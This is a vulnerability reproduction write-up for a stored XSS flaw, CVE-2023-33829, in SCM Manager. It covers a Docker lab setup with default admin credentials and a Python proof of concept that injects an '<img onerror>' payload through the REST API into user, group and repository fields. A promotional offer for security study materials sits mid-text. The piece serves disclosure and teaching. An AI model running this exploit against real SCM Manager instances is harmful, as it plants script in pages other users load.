1. Vulnerability description
Vulnerability brief
SCM-Manager is an open source repository management software that supports subversion, mercurial, and git repository management. The installation is simple, the function is strong, it provides rights management for users and user groups, and it has rich plug-in support. Since it is open source under the MIT license, it allows commercial use, and its code is available on GitHub. The project was initially used for research purposes only, and after its 2.0 version, it was taken over by Cloudogu to manage and develop its various code bases in order to provide professional enterprise-level support for various companies.
This vulnerability is mainly for attackers to use the code flaws in the description fields of multiple functions to construct payloads to carry out XSS attacks.
Vulnerability scope
Provider : Cloudogu
Product : SCM Manager
Affected versions confirmed : SCM Manager 1.2 <= 1.60
Fix version : >1.60 The latest version is 2.43.1
2. Vulnerability reproduction in actual combat
Environment build
docker image:
https://bitbucket.org/sdorra/docker-scm-manager/src/master/
Build with shell script
shell:
#!/bin/bash
mkdir /var/lib/scm
chown 1000:1000 /var/lib/scm
docker run -v /var/lib/scm:/var/lib/scm -p 8080:8080 sdorra/scm-manager
Vulnerability recurrence
First access to SCM Manager, authentication is required
Username : scmadmin Password: scmadmin
repositories
This vulnerability can be exploited in the Description field under the repository function
Create a new repository and use it with payload
Git type:
Subversion type:
Users
This vulnerability can be exploited in the Display Name field under the User function
To help you study cybersecurity, you can receive a full set of information for free:
① Mind map of cybersecurity learning and growth path
② 60+ classic cybersecurity toolkits
③ 100+ SRC analysis reports
④ 150+ e-books on cybersecurity attack and defense techniques
⑤ The most authoritative CISSP Certification Exam Guide + Question Bank
⑥ More than 1800 pages of CTF Practical Skills Manual
⑦ Collection of the latest interview questions from network security companies (including answers)
⑧ APP Client Security Testing Guide (Android+IOS)
Create a new repository and use it with payload
You can see that the Display Name attribute in the newly created account is abnormal, and the XSS payload is used successfully
Groups
This vulnerability can be exploited in the Description field under the Group function
In addition, it can be used according to the POC
POC:
import requests
import argparse
import sys
# Main menu
parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
parser.add_argument("-u", "--user", help="Admin user or user with write permissions")
parser.add_argument("-p", "--password", help="password of the user")
args = parser.parse_args()
# Credentials
user = sys.argv[2]
password = sys.argv[4]
# Global Variables
main_url = "http://localhost:8080/scm" # Change URL if its necessary
auth_url = main_url + "/api/rest/authentication/login.json"
users = main_url + "/api/rest/users.json"
groups = main_url + "/api/rest/groups.json"
repos = main_url + "/api/rest/repositories.json"
# Create a session
session = requests.Session()
# Credentials to send
post_data={
'username': user, # change if you have any other user with write permissions
'password': password # change if you have any other user with write permissions
}
r = session.post(auth_url, data=post_data)
if r.status_code == 200:
print("[+] Authentication successfully")
else:
print("[-] Failed to authenticate")
sys.exit(1)
new_user={
"name": "newUser",
"displayName": "<img src=x οnerrοr=alert('XSS')>",
"mail": "",
"password": "",
"admin": False,
"active": True,
"type": "xml"
}
create_user = session.post(users, json=new_user)
print("[+] User with XSS Payload created")
new_group={
"name": "newGroup",
"description": "<img src=x οnerrοr=alert('XSS')>",
"type": "xml"
}
create_group = session.post(groups, json=new_group)
print("[+] Group with XSS Payload created")
new_repo={
"name": "newRepo",
"type": "svn",
"contact": "",
"description": "<img src=x οnerrοr=alert('XSS')>",
"public": False
}
create_repo = session.post(repos, json=new_repo)
print("[+] Repository with XSS Payload created")
Bug fixes
It is recommended to update to the latest version of SCM Manager, currently 2.43.1
conclusion
This article mainly introduces the reproduction process of the CVE-2023-33829 SCM Manager XSS vulnerability. The vulnerability is mainly reflected in the fact that attackers use the code defects in the description fields of its multiple functions to construct payloads to carry out XSS attacks.
The reference point for this vulnerability is to avoid repeated calling of non-sensitive function codes by sensitive functions, and to perform filtering and verification, and to conduct necessary security tests.